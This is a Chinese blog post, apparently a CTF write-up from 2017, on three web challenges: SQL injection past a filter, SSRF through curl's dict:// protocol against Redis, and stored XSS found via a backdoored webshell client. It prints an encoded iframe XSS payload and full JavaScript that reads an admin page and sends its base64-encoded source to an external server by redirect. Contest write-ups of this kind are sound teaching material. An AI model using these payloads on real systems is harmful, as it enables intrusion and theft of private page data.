title: 校赛小记
date: 2017-05-30 09:46:20
tags: 'ctf'
端午来临之际,校赛也来了,感觉师傅们出的题还是相当用心的,感觉还是学到了不少,涨了姿势,趁着就来记录一发吧。
0x01简陋的博客
进去主页
测试发现get提交数据过滤的很死
尝试了post提交服务端同样会接受,而且没有那么多的过滤,之后就是绕过article,之前一直在想单引号既然全局转义感觉基本没头绪,后面一想那个article可能不一定是字符,有可能是表明列明之类的,尝试了反引号成功绕过,后面这里就通过报错注入获得的表名,直接丢burp跑出表明flag_is_here
大胆的推测列名是flag,这里直接就可以查出flag
0x02短域名工具
打开是一个输入url的框框,大概功能是我们任意给个url,服务端会返回一个地址,当你访问该地址的时候,他会做个重定向到你的实际url,这里的话有几点测试的,一番测试后发现他会去检验我们的请求协议头是有特殊字符,还有就是他会禁止私有地址的访问,这里想到存在ssrf,首先测试一下服务端的确是会请求我们输入的地址,想到可能是curl访问的找了一个curl特有的协议dict://发现是支持的,确定了是curl,这里想可能有两种方式运行,一种是调用system()函数,或者是直接使用模块,如果是前者或许会有一些命令执行的漏洞,然后一番测试后发现%00产生警告,发现不是用的system()
然后看到提示说明存在phpinfo页面,仔细看了一下,发现很特殊开了redis,想到可能是未授权访问但是觉得题目是在docker里不一定有crontab可以弹shell,当时还有个想法是flag在数据库里,我们读取出用某种特殊的路子带出来,发现这么做根本不行,于是尝试未授权访问,这里我是用的302跳转的私有ip,但是发现跳转的ip也执行不了命令后来把域名换成16进制ip就可以了,这里执行命令刚好配合dict://协议,协议利用这一部分后面专门总结一波。
0x03中国菜刀
拿到题目,下载下来是一把菜刀,菜刀一般的菜刀都有后门,于是自己写一个假的shell,然后wireshark抓包分析
得带一个base,然后解密可以得到一个地址http://118.89.225.190/shellbox.php?shell=
一段测试后发现script被过滤了,想到可能是xss打后台
测试了一下发现iframe标签其实没被过滤,这里开始是想到bctf那道题通过srcdoc属性来利用,这里发现被过滤了,后来直接在src里直接document.write可以的,这里利用还要编码一下
<IFrame Src="
javascript:document.write('<script src=http://139.199.122.115/1.js></script>')"></IFRame>
其实算是第一次自己完整做一个xss的题,感觉这个题核心就两点第一是payload的绕过第二是js脚本,其实都比较简单,但是由于接触不多,搞起来还是有点麻烦,我先是在xss平台打到一个不是那么好,后来又提示是打到源码,之前打到一个页面址/shellbox_admin.php,我把平台上js连抄带改放到自己vps上,最开始是想读取到源码解析dns然后我通过dns获取数据,后来发现url太长超出范围就不行了,最后发现直接带数据跳转页面来的比较快,然后就连修带改把xss平台的代码改了改放到vps,在另外一台vps监听一下端口,
下面是构造的payload,之前的进行编码10进制,16进制就可以
http://118.89.225.190/shellbox.php?shell=%3CIFRAME%20SRC%3D%22%0A%26%23106%3B%26%2397%3B%26%23118%3B%26%2397%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%26%2358%3B%26%23100%3B%26%23111%3B%26%2399%3B%26%23117%3B%26%23109%3B%26%23101%3B%26%23110%3B%26%23116%3B%26%2346%3B%26%23119%3B%26%23114%3B%26%23105%3B%26%23116%3B%26%23101%3B%26%2340%3B%26%2339%3B%26%2360%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%26%2332%3B%26%23115%3B%26%23114%3B%26%2399%3B%26%2361%3Bhttp%3A%2f%2f139.199.122.115%2f1.js%26%2362%3B%26%2360%3B%26%2347%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%26%2362%3B%26%2339%3B%26%2341%3B%22%3E%3C%2fIFRAME%3E%0A
带到源码:
拿到flag:
改的js脚本虽然比较p,但还是贴一下吧
var cr;
if (document.charset) {
cr = document.charset
} else if (document.characterSet) {
cr = document.characterSet
};
function createXmlHttp() {
if (window.XMLHttpRequest) {
xmlHttp = new XMLHttpRequest()
} else {
var MSXML = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');
for (var n = 0; n < MSXML.length; n++) {
try {
xmlHttp = new ActiveXObject(MSXML[n]);
break
} catch (e) {
}
}
}
}
createXmlHttp();
xmlHttp.onreadystatechange = writeSource;
xmlHttp.open('GET', 'shellbox_admin.php', true);
//xmlHttp.open('GET', 'http://'+code.slice(0,20)+'.2gbutj.ceye.io', true);
xmlHttp.send(null);
function writeSource() {
if (xmlHttp.readyState == 4) {
var code = BASE64.encoder(xmlHttp.responseText);
location.href="http://98.142.138.246/"+code;
}
}
function xssPost(url, postStr) {
var de;
de = document.body.appendChild(document.createElement('iframe'));
de.src = 'about:blank';
de.height = 1;
de.width = 1;
de.contentDocument.write('<form method="POST" action="' + url + '"><input name="code" value="' + postStr + '"/></form>');
de.contentDocument.forms[0].submit();
de.style.display = 'none';
}
/**
*create by 2012-08-25 pm 17:48
*@author hexinglun@gmail.com
*BASE64 Encode and Decode By UTF-8 unicode
*可以和java的BASE64编码和解码互相转化
*/
(function(){
var BASE64_MAPPING = [
'A','B','C','D','E','F','G','H',
'I','J','K','L','M','N','O','P',
'Q','R','S','T','U','V','W','X',
'Y','Z','a','b','c','d','e','f',
'g','h','i','j','k','l','m','n',
'o','p','q','r','s','t','u','v',
'w','x','y','z','0','1','2','3',
'4','5','6','7','8','9','+','/'
];
/**
*ascii convert to binary
*/
var _toBinary = function(ascii){
var binary = new Array();
while(ascii > 0){
var b = ascii%2;
ascii = Math.floor(ascii/2);
binary.push(b);
}
/*
var len = binary.length;
if(6-len > 0){
for(var i = 6-len ; i > 0 ; --i){
binary.push(0);
}
}*/
binary.reverse();
return binary;
};
/**
*binary convert to decimal
*/
var _toDecimal = function(binary){
var dec = 0;
var p = 0;
for(var i = binary.length-1 ; i >= 0 ; --i){
var b = binary[i];
if(b == 1){
dec += Math.pow(2 , p);
}
++p;
}
return dec;
};
/**
*unicode convert to utf-8
*/
var _toUTF8Binary = function(c , binaryArray){
var mustLen = (8-(c+1)) + ((c-1)*6);
var fatLen = binaryArray.length;
var diff = mustLen - fatLen;
while(--diff >= 0){
binaryArray.unshift(0);
}
var binary = [];
var _c = c;
while(--_c >= 0){
binary.push(1);
}
binary.push(0);
var i = 0 , len = 8 - (c+1);
for(; i < len ; ++i){
binary.push(binaryArray[i]);
}
for(var j = 0 ; j < c-1 ; ++j){
binary.push(1);
binary.push(0);
var sum = 6;
while(--sum >= 0){
binary.push(binaryArray[i++]);
}
}
return binary;
};
var __BASE64 = {
/**
*BASE64 Encode
*/
encoder:function(str){
var base64_Index = [];
var binaryArray = [];
for(var i = 0 , len = str.length ; i < len ; ++i){
var unicode = str.charCodeAt(i);
var _tmpBinary = _toBinary(unicode);
if(unicode < 0x80){
var _tmpdiff = 8 - _tmpBinary.length;
while(--_tmpdiff >= 0){
_tmpBinary.unshift(0);
}
binaryArray = binaryArray.concat(_tmpBinary);
}else if(unicode >= 0x80 && unicode <= 0x7FF){
binaryArray = binaryArray.concat(_toUTF8Binary(2 , _tmpBinary));
}else if(unicode >= 0x800 && unicode <= 0xFFFF){//UTF-8 3byte
binaryArray = binaryArray.concat(_toUTF8Binary(3 , _tmpBinary));
}else if(unicode >= 0x10000 && unicode <= 0x1FFFFF){//UTF-8 4byte
binaryArray = binaryArray.concat(_toUTF8Binary(4 , _tmpBinary));
}else if(unicode >= 0x200000 && unicode <= 0x3FFFFFF){//UTF-8 5byte
binaryArray = binaryArray.concat(_toUTF8Binary(5 , _tmpBinary));
}else if(unicode >= 4000000 && unicode <= 0x7FFFFFFF){//UTF-8 6byte
binaryArray = binaryArray.concat(_toUTF8Binary(6 , _tmpBinary));
}
}
var extra_Zero_Count = 0;
for(var i = 0 , len = binaryArray.length ; i < len ; i+=6){
var diff = (i+6)-len;
if(diff == 2){
extra_Zero_Count = 2;
}else if(diff == 4){
extra_Zero_Count = 4;
}
//if(extra_Zero_Count > 0){
// len += extra_Zero_Count+1;
//}
var _tmpExtra_Zero_Count = extra_Zero_Count;
while(--_tmpExtra_Zero_Count >= 0){
binaryArray.push(0);
}
base64_Index.push(_toDecimal(binaryArray.slice(i , i+6)));
}
var base64 = '';
for(var i = 0 , len = base64_Index.length ; i < len ; ++i){
base64 += BASE64_MAPPING[base64_Index[i]];
}
for(var i = 0 , len = extra_Zero_Count/2 ; i < len ; ++i){
base64 += '=';
}
return base64;
},
/**
*BASE64 Decode for UTF-8
*/
decoder : function(_base64Str){
var _len = _base64Str.length;
var extra_Zero_Count = 0;
/**
*计算在进行BASE64编码的时候,补了几个0
*/
if(_base64Str.charAt(_len-1) == '='){
//alert(_base64Str.charAt(_len-1));
//alert(_base64Str.charAt(_len-2));
if(_base64Str.charAt(_len-2) == '='){//两个等号说明补了4个0
extra_Zero_Count = 4;
_base64Str = _base64Str.substring(0 , _len-2);
}else{//一个等号说明补了2个0
extra_Zero_Count = 2;
_base64Str = _base64Str.substring(0 , _len - 1);
}
}
var binaryArray = [];
for(var i = 0 , len = _base64Str.length; i < len ; ++i){
var c = _base64Str.charAt(i);
for(var j = 0 , size = BASE64_MAPPING.length ; j < size ; ++j){
if(c == BASE64_MAPPING[j]){
var _tmp = _toBinary(j);
/*不足6位的补0*/
var _tmpLen = _tmp.length;
if(6-_tmpLen > 0){
for(var k = 6-_tmpLen ; k > 0 ; --k){
_tmp.unshift(0);
}
}
binaryArray = binaryArray.concat(_tmp);
break;
}
}
}
if(extra_Zero_Count > 0){
binaryArray = binaryArray.slice(0 , binaryArray.length - extra_Zero_Count);
}
var unicode = [];
var unicodeBinary = [];
for(var i = 0 , len = binaryArray.length ; i < len ; ){
if(binaryArray[i] == 0){
unicode=unicode.concat(_toDecimal(binaryArray.slice(i,i+8)));
i += 8;
}else{
var sum = 0;
while(i < len){
if(binaryArray[i] == 1){
++sum;
}else{
break;
}
++i;
}
unicodeBinary = unicodeBinary.concat(binaryArray.slice(i+1 , i+8-sum));
i += 8 - sum;
while(sum > 1){
unicodeBinary = unicodeBinary.concat(binaryArray.slice(i+2 , i+8));
i += 8;
--sum;
}
unicode = unicode.concat(_toDecimal(unicodeBinary));
unicodeBinary = [];
}
}
return unicode;
}
};
window.BASE64 = __BASE64;
})();
后记
主要我做了就这三个题,还有个nodejs的杂项当时算法也看差不多,思路也比较清晰,可惜就是代码写的少,基础不扎实,最后并没有跑出来,感觉还是要好好搞一搞js哇。太菜了。这次比赛讲真的题目真的很不错,尤其是那些没做来的题,还是值得好好研究研究的。当然比赛完还有一些杂七杂八的事还有人,路遥知马力。